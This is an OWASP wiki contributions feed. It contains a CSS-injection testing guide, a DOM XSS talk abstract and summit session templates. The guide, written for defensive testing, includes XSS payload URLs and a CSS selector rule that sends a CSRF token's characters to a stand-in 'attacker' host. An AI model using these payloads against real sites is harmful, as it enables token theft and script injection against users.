https://wiki.owasp.org/api.php?action=feedcontributions&feedformat=atom&user=Wisec OWASP - User contributions [en] 2026-04-06T13:12:01Z User contributions MediaWiki 1.27.2 https://wiki.owasp.org/index.php?title=Testing_for_CSS_Injection_(OTG-CLIENT-005)&diff=236672 Testing for CSS Injection (OTG-CLIENT-005) 2018-01-08T14:20:17Z <p>Wisec: fixed broken link</p> <hr /> <div>{{Template:OWASP Testing Guide v4}}<br /> <br /> == Summary ==<br /> <br /> A CSS Injection vulnerability involves the ability to inject arbitrary CSS code in the context of a trusted web site, and this will be rendered inside the victim's browser. The impact of such a vulnerability may vary on the basis of the supplied CSS payload: it could lead to Cross-Site Scripting in particular circumstances, to data exfiltration in the sense of extracting sensitive data or to UI modifications. <br /> <br /> <br /> == How to Test == <br /> Such a vulnerability occurs when the application allows to supply user-generated CSS or it is possible to somehow interfere with the legit stylesheets. Injecting code in the CSS context gives the attacker the possibility to execute JavaScript in certain conditions as well as extracting sensitive values through CSS selectors and functions able to generate HTTP requests. Actually, giving the users the possibility to customize their own personal pages by using custom CSS files results in a considerable risk, and should be definitely avoided. <br /> <br /> <br /> The following JavaScript code shows a possible vulnerable script in which the attacker is able to control the &quot;location.hash&quot; (source) which reaches the &quot;cssText&quot; function (sink). This particular case may lead to DOMXSS in older browser versions, such as Opera, Internet Explorer and Firefox; for reference see DOM XSS Wiki, section &quot;Style Sinks&quot;. <br /> <br /> &lt;pre&gt;<br /> &lt;a id=&quot;a1&quot;&gt;Click me&lt;/a&gt; <br /> &lt;script&gt; <br /> if (location.hash.slice(1)) { <br /> document.getElementById(&quot;a1&quot;).style.cssText = &quot;color: &quot; + location.hash.slice(1); <br /> } <br /> &lt;/script&gt; <br /> &lt;/pre&gt;<br /> <br /> <br /> Specifically the attacker could target the victim by asking her to visit the following URLs: &lt;br /&gt;<br /> &lt;ul&gt;<br /> &lt;li&gt;www.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current; (Opera [8,12])&lt;/li&gt;<br /> &lt;li&gt;www.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)&lt;/li&gt;<br /> &lt;/ul&gt;<br /> <br /> <br /> The same vulnerability may appear in the case of classical reflected XSS in which for instance the PHP code looks like the following: <br /> <br /> &lt;pre&gt;<br /> &lt;style&gt; <br /> p { <br /> color: &lt;?php echo $_GET['color']; ?&gt;; <br /> text-align: center; <br /> } <br /> &lt;/style&gt; <br /> &lt;/pre&gt;<br /> <br /> <br /> Much more interesting attack scenarios involve the possibility to extract data through the adoption of pure CSS rules. Such attacks can be conducted through CSS selectors and leading for instance to grab anti-CSRF tokens, as follows. In particular, input[name=csrf_token][value=^a] represents an element with the attribute &quot;name&quot; set &quot;csrf_token&quot; and whose attribute &quot;value&quot; starts with &quot;a&quot;. By detecting the length of the attribute &quot;value&quot;, it is possible to carry out a brute force attack against it and send its value to the attacker's domain. <br /> <br /> &lt;pre&gt;<br /> &lt;style&gt; <br /> input[name=csrf_token][value=^a] { <br /> background-image: url(http://attacker/log?a); <br /> } <br /> &lt;/style&gt; <br /> &lt;/pre&gt;<br /> <br /> <br /> Much more modern attacks involving a combination of SVG, CSS and HTML5 have been proven feasible, therefore we recommend to see the References section for details. <br /> <br /> <br /> === Black Box testing ===<br /> We are referring to client-side testing, therefore black box testing is not usually performed since access to the source code is always available as it needs to be sent to the client to be executed. However, it may happen that the user is given a certain degree of freedom in terms of possibilities to supply HTML code; in that case it is required to test whether no CSS injections are possible: tags like &quot;link&quot; and &quot;style&quot; should be disallowed, as well as attributes &quot;style&quot;. <br /> <br /> <br /> === Gray Box testing === <br /> '''Testing for CSS Injection vulnerabilities:'''&lt;br&gt;<br /> Manual testing needs to be conducted and the JavaScript code analyzed in order to understand whether the attackers can inject its own content in CSS context. In particular we should be interested in how the website returns CSS rules on the basis of the inputs.<br /> <br /> <br /> The following is a basic example: <br /> <br /> &lt;pre&gt;<br /> &lt;a id=&quot;a1&quot;&gt;Click me&lt;/a&gt; <br /> &lt;b&gt;Hi&lt;/b&gt; <br /> &lt;script&gt; <br /> $(&quot;a&quot;).click(function(){ <br /> $(&quot;b&quot;).attr(&quot;style&quot;,&quot;color: &quot; + location.hash.slice(1)); <br /> }); <br /> &lt;/script&gt; <br /> &lt;/pre&gt;<br /> <br /> <br /> The above code contains a source &quot;location.hash&quot; that is controlled by the attacker that can inject directly in the attribute &quot;style&quot; of an HTML element. As mentioned above, this may lead to different results on the basis of the adopted browser and the supplied payload. <br /> <br /> <br /> It is recommended that testers use the jQuery function css(property, value) in such circumstances as follows, since this would disallow any damaging injections. In general, we recommend to use always a whitelist of allowed characters any time the input is reflected in the CSS context. <br /> <br /> &lt;pre&gt;<br /> &lt;a id=&quot;a1&quot;&gt;Click me&lt;/a&gt; <br /> &lt;b&gt;Hi&lt;/b&gt; <br /> &lt;script&gt; <br /> $(&quot;a&quot;).click(function(){ <br /> $(&quot;b&quot;).css(&quot;color&quot;,location.hash.slice(1)); <br /> }); <br /> &lt;/script&gt; <br /> &lt;/pre&gt;<br /> <br /> <br /> == References ==<br /> '''OWASP Resources'''<br /> * [[DOM based XSS Prevention Cheat Sheet]]<br /> * DOMXSS Wiki - https://code.google.com/p/domxsswiki/wiki/CssText <br /> <br /> <br /> '''Presentations'''&lt;br&gt;<br /> * DOM Xss Identification and Exploitation, Stefano Di Paola - [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/dominator/DOMXss_Identification_and_exploitation.pdf http://dominator.googlecode.com/files/DOMXss_Identification_and_exploitation.pdf] <br /> * Got Your Nose! How To Steal Your Precious Data Without Using Scripts, Mario Heiderich - http://www.youtube.com/watch?v=FIQvAaZj_HA <br /> * Bypassing Content-Security-Policy, Alex Kouzemtchenko - http://ruxcon.org.au/assets/slides/CSP-kuza55.pptx<br /> <br /> <br /> '''Proof of Concepts'''&lt;br&gt;<br /> * Password &quot;cracker&quot; via CSS and HTML5 - http://html5sec.org/invalid/?length=25 <br /> * CSS attribute reading - http://eaea.sirdarckcat.net/cssar/v2/</div> Wisec https://wiki.owasp.org/index.php?title=OWASP_AppSec_DC_2012/Unraveling_some_of_the_Mysteries_around_DOMbased_XSS&diff=127369 OWASP AppSec DC 2012/Unraveling some of the Mysteries around DOMbased XSS 2012-04-03T13:14:21Z <p>Wisec: </p> <hr /> <div>&lt;noinclude&gt;{{:OWASP AppSec DC 2012 Header}}&lt;/noinclude&gt;<br /> __NOTOC__<br /> == The Presentation ==<br /> DOM-based XSS was first revealed to the world back in 2005 by Amit Klien, when it was an interesting theoretical vulnerability. In 2012, with the push towards Web 2.0 well into the mainstream, DOM-based XSS has become a very commonly uncovered and exploited vulnerability, but it's poorly understood.&lt;br&gt;This talk will focus on the full range of issues around DOM-based XSS. It will start with a discussion of the technical details of the vulnerability, the true nature of the risk it introduces (both likelihood and impact), and some new terminology and updated definitions about what truly is a DOM-based XSS vulnerability as compared to the standard Stored and Reflected XSS that the community is well aware of. It will then discuss the difficulties that security analysts face when trying to find DOM-based XSS flaws, and provide recommended analysis techniques that help move DOM-based XSS discovery from an art towards more of a science. And finally, it will discuss simple techniques for avoiding DOM-based XSS issues in the first place as well as how to mitigate issues that are uncovered during a security review.&lt;br&gt;This talk will include discussion of numerous open source resources that are available on this topic. OWASP has numerous articles on DOM-based XSS, including a definition article (https://www.owasp.org/index.php/DOM_Based_XSS), an OWASP testing guide article _site_scripting_(OWASP-DV-003)), and the DOM-based XSS prevention cheat sheet eat_Sheet), and there are also other open source articles from leading researchers like Stefano Di Paola (http://code.google.com/p/domxsswiki/wiki/Introduction) as well. The speaker has already contributed to all of these OWASP articles and in preparation for this talk, plans to review and contribute additional enhancements to each of these articles in order to make the author's recommendations publically available to the web security community in a very broad manner far beyond just delivering this talk at AppSec DC. The talk will also showcase and provide worked examples of how to use open source proxy tools like OWASP ZAP (https://www.owasp.org/index.php/ZAP) and WebScarab (https://www.owasp.org/index.php/WebScarab), along with Firebug and Chrome's developer tools to track down DOM-based XSS issues within an application. The only open source DOM-based XSS detection tool, DOMinator (http://code.google.com/p/dominator/), will also be showcased in this talk.<br /> == The Speakers ==<br /> &lt;table&gt;<br /> &lt;tr&gt;<br /> &lt;td&gt;<br /> ===Dave Wichers===<br /> [[Image:Owasp_logo_normal.jpg|left]]Bio TBA<br /> &lt;/td&gt;<br /> &lt;/tr&gt;<br /> &lt;/table&gt;<br /> &lt;noinclude&gt;{{:OWASP AppSec DC 2012 Footer}}&lt;/noinclude&gt;</div> Wisec https://wiki.owasp.org/index.php?title=Summit_2011_Working_Sessions/Session043&diff=103412 Summit 2011 Working Sessions/Session043 2011-02-05T08:10:13Z <p>Wisec: </p> <hr /> <div>{{Template:&lt;includeonly&gt;{{{1}}}&lt;/includeonly&gt;&lt;noinclude&gt;Summit 2011 Working Sessions test tab&lt;/noinclude&gt;<br /> |-<br /> <br /> | summit_session_attendee_name1 = Lucas C. Ferreira<br /> | summit_session_attendee_email1 = lucas.ferreira@owasp.org<br /> | summit_session_attendee_username1 = <br /> | summit_session_attendee_company1=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed1=<br /> <br /> | summit_session_attendee_name2 = Achim Hoffmann<br /> | summit_session_attendee_email2 = achim@owasp.org<br /> | summit_session_attendee_username2 = Achim<br /> | summit_session_attendee_company2= sic[!]sec<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed2=<br /> <br /> | summit_session_attendee_name3 = Justin Clarke<br /> | summit_session_attendee_email3 = justin.clarke@owasp.org<br /> | summit_session_attendee_username3 = <br /> | summit_session_attendee_company3=Gotham Digital Science<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed3=How can we package, and/or make this easier for noobs to deploy?<br /> <br /> | summit_session_attendee_name4 = Giorgio Fedon<br /> | summit_session_attendee_email4 = <br /> | summit_session_attendee_username4 = gfedon<br /> | summit_session_attendee_company4=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed4=<br /> <br /> | summit_session_attendee_name5 = Abraham Kang<br /> | summit_session_attendee_email5 = <br /> | summit_session_attendee_username5 = <br /> | summit_session_attendee_company5=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed5=<br /> <br /> | summit_session_attendee_name6 = Mario Heiderich<br /> | summit_session_attendee_email6 = <br /> | summit_session_attendee_username6 = <br /> | summit_session_attendee_company6= Ruhr University Bochum / NDS<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed6= Filter Evasions<br /> <br /> | summit_session_attendee_name7 = Gareth Heyes<br /> | summit_session_attendee_email7 = <br /> | summit_session_attendee_username7 = <br /> | summit_session_attendee_company7= Businessinfo<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed7=<br /> <br /> | summit_session_attendee_name8 = Eduardo Vela<br /> | summit_session_attendee_email8 = evn@google.com<br /> | summit_session_attendee_username8 = EduardoVela<br /> | summit_session_attendee_company8= Google<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed8= ACS etc..<br /> <br /> | summit_session_attendee_name9 = Stefano Di Paola<br /> | summit_session_attendee_email9 = <br /> | summit_session_attendee_username9 = Wisec<br /> | summit_session_attendee_company9= Minded Security<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed9=<br /> <br /> | summit_session_attendee_name10 = <br /> | summit_session_attendee_email10 = <br /> | summit_session_attendee_username10 = <br /> | summit_session_attendee_company10=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed10=<br /> <br /> | summit_session_attendee_name11 = <br /> | summit_session_attendee_email11 = <br /> | summit_session_attendee_username11 = <br /> | summit_session_attendee_company11=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed11=<br /> <br /> | summit_session_attendee_name12 = <br /> | summit_session_attendee_email12 = <br /> | summit_session_attendee_username12 = <br /> | summit_session_attendee_company12=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed12=<br /> <br /> | summit_session_attendee_name13 = <br /> | summit_session_attendee_email13 = <br /> | summit_session_attendee_username13 = <br /> | summit_session_attendee_company13=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed13=<br /> <br /> | summit_session_attendee_name14 = <br /> | summit_session_attendee_email14 = <br /> | summit_session_attendee_username14 = <br /> | summit_session_attendee_company14=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed14= <br /> <br /> | summit_session_attendee_name15 = <br /> | summit_session_attendee_email15 = <br /> | summit_session_attendee_username15 = <br /> | summit_session_attendee_company15=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed15=<br /> <br /> | summit_session_attendee_name16 = <br /> | summit_session_attendee_email16 = <br /> | summit_session_attendee_username16 = <br /> | summit_session_attendee_company16=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed16=<br /> <br /> | summit_session_attendee_name17 = <br /> | summit_session_attendee_email17 = <br /> | summit_session_attendee_username17 = <br /> | summit_session_attendee_company17=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed17=<br /> <br /> | summit_session_attendee_name18 = <br /> | summit_session_attendee_email18 = <br /> | summit_session_attendee_username18 = <br /> | summit_session_attendee_company18=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed18=<br /> <br /> | summit_session_attendee_name19 = <br /> | summit_session_attendee_email19 = <br /> | summit_session_attendee_username19 = <br /> | summit_session_attendee_company19=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed19=<br /> <br /> | summit_session_attendee_name20 = <br /> | summit_session_attendee_email20 = <br /> | summit_session_attendee_username20 = <br /> | summit_session_attendee_company20=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed20=<br /> <br /> |-<br /> | summit_track_logo = [[Image:T._cross_site.jpg]]<br /> | summit_ws_logo = [[Image:WS._cross_site.jpg]]<br /> | summit_session_name = WAF Mitigations for XSS<br /> | summit_session_url = http://www.owasp.org/index.php/Summit_2011_Working_Sessions/Session043<br /> | mailing_list =<br /> <br /> |-<br /> <br /> | short_working_session_description= To discuss if/when/how web application firewalls can help to prevent XSS attacks<br /> <br /> |-<br /> <br /> | related_project_name1 = Blog post by Ryan Barnett on defending against XSS<br /> | related_project_url_1 = http://blog.modsecurity.org/2010/09/advanced-topic-of-the-week-identifying-improper-output-handling-xss-flaws.html<br /> <br /> | related_project_name2 = Blog post by Ryan Barnett on using content injection to combat XSS<br /> | related_project_url_2 = http://blog.modsecurity.org/2010/09/advanced-topic-of-the-week-xss-defense-via-content-injection.html<br /> <br /> | related_project_name3 = ModSecurity Demo<br /> | related_project_url_3 = http://www.modsecurity.org/demo/demo-deny-noescape.html<br /> <br /> | related_project_name4 = <br /> | related_project_url_4 = <br /> <br /> | related_project_name5 = <br /> | related_project_url_5 = <br /> <br /> |-<br /> <br /> | summit_session_objective_name1= Improve XSS Attack Payload Detection Techniques<br /> <br /> | summit_session_objective_name2 = Identifying Improper Output Handling Flaws in Web Apps<br /> <br /> | summit_session_objective_name3 = Feasibility of Profile Page Scripts/Iframes<br /> <br /> | summit_session_objective_name4 = Testing Injection of JS Sandbox Code in Responses<br /> <br /> | summit_session_objective_name5 = <br /> <br /> |-<br /> <br /> | working_session_date_and_time = <br /> <br /> |-<br /> <br /> | discussion_model = participants and attendees<br /> <br /> |-<br /> <br /> | operational_resources = Projector, whiteboards, markers, Internet connectivity, power<br /> <br /> |-<br /> <br /> | working_session_additional_details = <br /> <br /> |-<br /> <br /> |summit_session_deliverable_name1 = White paper describing “Next Generation WAF Capabilities” such as the ones described above. Include areas requiring additional research and funding.<br /> <br /> |summit_session_deliverable_name2 = <br /> <br /> |summit_session_deliverable_name3 = <br /> <br /> |summit_session_deliverable_name4 = <br /> <br /> |summit_session_deliverable_name5 = <br /> <br /> |summit_session_deliverable_name6 = <br /> <br /> |summit_session_deliverable_name7 = <br /> <br /> |summit_session_deliverable_name8 = <br /> <br /> |-<br /> <br /> | summit_session_leader_name1 = Ryan Barnett<br /> | summit_session_leader_email1 = ryan.barnett@owasp.org<br /> | summit_session_leader_username1 = Rcbarnett<br /> <br /> | summit_session_leader_name2 = <br /> | summit_session_leader_email2 = <br /> | summit_session_leader_username2 =<br /> <br /> | summit_session_leader_name3 = <br /> | summit_session_leader_email3 = <br /> | summit_session_leader_username3 =<br /> <br /> |-<br /> <br /> | operational_leader_name1 =<br /> | operational_leader_email1 =<br /> | operational_leader_username1 = <br /> <br /> |-<br /> <br /> | meeting_notes = <br /> <br /> |-<br /> <br /> | session_name_mask = &lt;!--Please replace DO NOT EDIT this string --&gt; Session043<br /> | session_home_page = &lt;!--Please replace DO NOT EDIT this string --&gt; Summit_2011_Working_Sessions/Session043<br /> }}</div> Wisec https://wiki.owasp.org/index.php?title=Summit_2011_Working_Sessions/Session005&diff=101834 Summit 2011 Working Sessions/Session005 2011-01-25T09:46:44Z <p>Wisec: </p> <hr /> <div>{{Template:&lt;includeonly&gt;{{{1}}}&lt;/includeonly&gt;&lt;noinclude&gt;Summit 2011 Working Sessions test tab&lt;/noinclude&gt;<br /> |-<br /> <br /> | summit_session_attendee_name1 = John Wilander<br /> | summit_session_attendee_email1 = john.wilander@owasp.org<br /> | summit_session_attendee_company1=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed1=<br /> <br /> | summit_session_attendee_name2 = Michael Coates<br /> | summit_session_attendee_email2 = <br /> | summit_session_attendee_company2=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed2=<br /> <br /> | summit_session_attendee_name3 = Colin Watson<br /> | summit_session_attendee_email3 = <br /> | summit_session_attendee_company3=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed3=<br /> <br /> | summit_session_attendee_name4 = Stefano Di Paola<br /> | summit_session_attendee_email4 = <br /> | summit_session_attendee_company4=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed4=<br /> <br /> | summit_session_attendee_name5 = <br /> | summit_session_attendee_email5 = <br /> | summit_session_attendee_company5=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed5=<br /> <br /> | summit_session_attendee_name6 = <br /> | summit_session_attendee_email6 = <br /> | summit_session_attendee_company6=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed6=<br /> <br /> | summit_session_attendee_name7 = <br /> | summit_session_attendee_email7 = <br /> | summit_session_attendee_company7=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed7=<br /> <br /> | summit_session_attendee_name8 = <br /> | summit_session_attendee_email8 = <br /> | summit_session_attendee_company8=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed8=<br /> <br /> | summit_session_attendee_name9 = <br /> | summit_session_attendee_email9 = <br /> | summit_session_attendee_company9=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed9=<br /> <br /> | summit_session_attendee_name10 = <br /> | summit_session_attendee_email10 = <br /> | summit_session_attendee_company10=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed10=<br /> <br /> | summit_session_attendee_name11 = <br /> | summit_session_attendee_email11 = <br /> | summit_session_attendee_company11=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed11=<br /> <br /> | summit_session_attendee_name12 = <br /> | summit_session_attendee_email12 = <br /> | summit_session_attendee_company12=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed12=<br /> <br /> | summit_session_attendee_name13 = <br /> | summit_session_attendee_email13 = <br /> | summit_session_attendee_company13=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed13=<br /> <br /> | summit_session_attendee_name14 = <br /> | summit_session_attendee_email14 = <br /> | summit_session_attendee_company14=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed14= <br /> <br /> | summit_session_attendee_name15 = <br /> | summit_session_attendee_email15 = <br /> | summit_session_attendee_company15=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed15=<br /> <br /> | summit_session_attendee_name16 = <br /> | summit_session_attendee_email16 = <br /> | summit_session_attendee_company16=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed16=<br /> <br /> | summit_session_attendee_name17 = <br /> | summit_session_attendee_email17 = <br /> | summit_session_attendee_company17=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed17=<br /> <br /> | summit_session_attendee_name18 = <br /> | summit_session_attendee_email18 = <br /> | summit_session_attendee_company18=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed18=<br /> <br /> | summit_session_attendee_name19 = <br /> | summit_session_attendee_email19 = <br /> | summit_session_attendee_company19=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed19=<br /> <br /> | summit_session_attendee_name20 = <br /> | summit_session_attendee_email20 = <br /> | summit_session_attendee_company20=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed20=<br /> <br /> |-<br /> | summit_track_logo = [[Image:T._browser_security.jpg]]<br /> | summit_ws_logo = [[Image:WS._browser_security.jpg]]<br /> | summit_session_name = New HTTP Header<br /> | summit_session_url = http://www.owasp.org/index.php/Summit_2011_Working_Sessions/Session005<br /> | mailing_list = https://groups.google.com/group/owasp-summit-browsersec<br /> |-<br /> <br /> | short_working_session_description= Are new opt-in HTTP headers the right way to add security features? For example:<br /> * [http://tools.ietf.org/html/draft-hodges-strict-transport-sec-02 HTTP Strict Transport Security] for enforced HTTPS (supported in Chrome 4, Firefox+NoScript, Firefox 4 and up)<br /> * [http://blogs.msdn.com/b/ie/archive/2009/01/27/ie8-security-part-vii-clickjacking-defenses.aspx X-Frame-Options] for non-framing (supported in IE8, FF3.6, Safari 4, Opera 10.5, Chrome 4 and up)<br /> * [https://developer.mozilla.org/en/Introducing_Content_Security_Policy Content Security Policy] for whitelisting of script and media sources (supported in Firefox 4 and up)<br /> <br /> |-<br /> <br /> | related_project_name1 = Browser Security Track - main page<br /> | related_project_url_1 = http://www.owasp.org/index.php/Category:Summit_2011_Browser_Security_Track<br /> <br /> | related_project_name2 = Google Group for the Browser Security Track<br /> | related_project_url_2 = https://groups.google.com/group/owasp-summit-browsersec<br /> <br /> | related_project_name3 = <br /> | related_project_url_3 = <br /> <br /> | related_project_name4 = <br /> | related_project_url_4 = <br /> <br /> | related_project_name5 = <br /> | related_project_url_5 = <br /> <br /> |-<br /> <br /> | summit_session_objective_name1= <br /> <br /> | summit_session_objective_name2 = <br /> <br /> | summit_session_objective_name3 = <br /> <br /> | summit_session_objective_name4 = <br /> <br /> | summit_session_objective_name5 = <br /> |-<br /> <br /> | working_session_date_and_time = Tuesday, 09 February &lt;br&gt; Time: TBA<br /> <br /> |-<br /> <br /> | discussion_model = The working form will most probably be short presentations to frame the topic and then round table discussions. Depending on number of attendees we'll break into groups.<br /> <br /> |-<br /> <br /> | operational_resources = Projector, whiteboards, markers, Internet connectivity, power<br /> <br /> |-<br /> <br /> | working_session_additional_details = &lt;br&gt;<br /> <br /> ===Co-chair John Wilander===<br /> [http://www.owasp.org/index.php/User:John.wilander John Wilander] is chapter co-leader in Sweden and ran the AppSec conference in Stockholm 2010. He is still [http://www.ida.liu.se/~johwi/research_publications/ pursuing his PhD in software security] and works as an appsec consultant in media/banking/healthcare.<br /> <br /> ===Co-chair Michael Coates===<br /> [http://www.owasp.org/index.php/User:MichaelCoates Michael Coates] is a long-time OWASP contributor and leader, as well as a Mozilla employee. He leads the [http://www.owasp.org/index.php/Category:OWASP_AppSensor_Project AppSensor] and the [http://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet TLS Cheat Sheet] project.<br /> |-<br /> <br /> |summit_session_deliverable_name1 = Browser Security Report<br /> |summit_session_deliverable_url_1 = <br /> <br /> |summit_session_deliverable_name2 = Browser Security Priority List<br /> |summit_session_deliverable_url_2 = <br /> <br /> |summit_session_deliverable_name3 = <br /> |summit_session_deliverable_url_3 = <br /> <br /> |summit_session_deliverable_name4 = <br /> |summit_session_deliverable_url_4 = <br /> <br /> |summit_session_deliverable_name5 = <br /> |summit_session_deliverable_url_5 = <br /> <br /> |-<br /> <br /> | summit_session_leader_name1 = John Wilander<br /> | summit_session_leader_email1 = john.wilander@owasp.org<br /> <br /> | summit_session_leader_name2 = Michal Coates<br /> | summit_session_leader_email2 = michael.coates@owasp.org<br /> <br /> | summit_session_leader_name3 =<br /> | summit_session_leader_email3 = <br /> <br /> |-<br /> <br /> | operational_leader_name1 = John Wilander<br /> | operational_leader_email1 = john.wilander@owasp.org<br /> <br /> |-<br /> | meeting_notes = <br /> |-<br /> | session_name_mask = &lt;!--Please replace DO NOT EDIT this string --&gt; Session005<br /> | session_home_page = &lt;!--Please replace DO NOT EDIT this string --&gt; Summit_2011_Working_Sessions/Session005<br /> }}<br /> &lt;/includeonly&gt;</div> Wisec https://wiki.owasp.org/index.php?title=Summit_2011_Working_Sessions/Session003&diff=101833 Summit 2011 Working Sessions/Session003 2011-01-25T09:46:19Z <p>Wisec: </p> <hr /> <div>{{Template:&lt;includeonly&gt;{{{1}}}&lt;/includeonly&gt;&lt;noinclude&gt;Summit 2011 Working Sessions test tab&lt;/noinclude&gt;<br /> |-<br /> <br /> | summit_session_attendee_name1 = John Wilander<br /> | summit_session_attendee_email1 = john.wilander@owasp.org<br /> | summit_session_attendee_company1=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed1=<br /> <br /> | summit_session_attendee_name2 = Michael Coates<br /> | summit_session_attendee_email2 = <br /> | summit_session_attendee_company2=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed2=<br /> <br /> | summit_session_attendee_name3 = Colin Watson<br /> | summit_session_attendee_email3 = <br /> | summit_session_attendee_company3=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed3=<br /> <br /> | summit_session_attendee_name4 = Stefano Di Paola<br /> | summit_session_attendee_email4 = <br /> | summit_session_attendee_company4=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed4=<br /> <br /> | summit_session_attendee_name5 = <br /> | summit_session_attendee_email5 = <br /> | summit_session_attendee_company5=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed5=<br /> <br /> | summit_session_attendee_name6 = <br /> | summit_session_attendee_email6 = <br /> | summit_session_attendee_company6=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed6=<br /> <br /> | summit_session_attendee_name7 = <br /> | summit_session_attendee_email7 = <br /> | summit_session_attendee_company7=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed7=<br /> <br /> | summit_session_attendee_name8 = <br /> | summit_session_attendee_email8 = <br /> | summit_session_attendee_company8=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed8=<br /> <br /> | summit_session_attendee_name9 = <br /> | summit_session_attendee_email9 = <br /> | summit_session_attendee_company9=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed9=<br /> <br /> | summit_session_attendee_name10 = <br /> | summit_session_attendee_email10 = <br /> | summit_session_attendee_company10=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed10=<br /> <br /> | summit_session_attendee_name11 = <br /> | summit_session_attendee_email11 = <br /> | summit_session_attendee_company11=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed11=<br /> <br /> | summit_session_attendee_name12 = <br /> | summit_session_attendee_email12 = <br /> | summit_session_attendee_company12=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed12=<br /> <br /> | summit_session_attendee_name13 = <br /> | summit_session_attendee_email13 = <br /> | summit_session_attendee_company13=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed13=<br /> <br /> | summit_session_attendee_name14 = <br /> | summit_session_attendee_email14 = <br /> | summit_session_attendee_company14=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed14= <br /> <br /> | summit_session_attendee_name15 = <br /> | summit_session_attendee_email15 = <br /> | summit_session_attendee_company15=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed15=<br /> <br /> | summit_session_attendee_name16 = <br /> | summit_session_attendee_email16 = <br /> | summit_session_attendee_company16=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed16=<br /> <br /> | summit_session_attendee_name17 = <br /> | summit_session_attendee_email17 = <br /> | summit_session_attendee_company17=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed17=<br /> <br /> | summit_session_attendee_name18 = <br /> | summit_session_attendee_email18 = <br /> | summit_session_attendee_company18=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed18=<br /> <br /> | summit_session_attendee_name19 = <br /> | summit_session_attendee_email19 = <br /> | summit_session_attendee_company19=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed19=<br /> <br /> | summit_session_attendee_name20 = <br /> | summit_session_attendee_email20 = <br /> | summit_session_attendee_company20=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed20=<br /> <br /> |-<br /> | summit_track_logo = [[Image:T._browser_security.jpg]]<br /> | summit_ws_logo = [[Image:WS._browser_security.jpg]]<br /> | summit_session_name = EcmaScript 5 Security<br /> | summit_session_url = http://www.owasp.org/index.php/Summit_2011_Working_Sessions/Session003<br /> | mailing_list = https://groups.google.com/group/owasp-summit-browsersec<br /> |-<br /> <br /> | short_working_session_description= <br /> |-<br /> <br /> | related_project_name1 = Browser Security Track - main page<br /> | related_project_url_1 = http://www.owasp.org/index.php/Category:Summit_2011_Browser_Security_Track<br /> <br /> 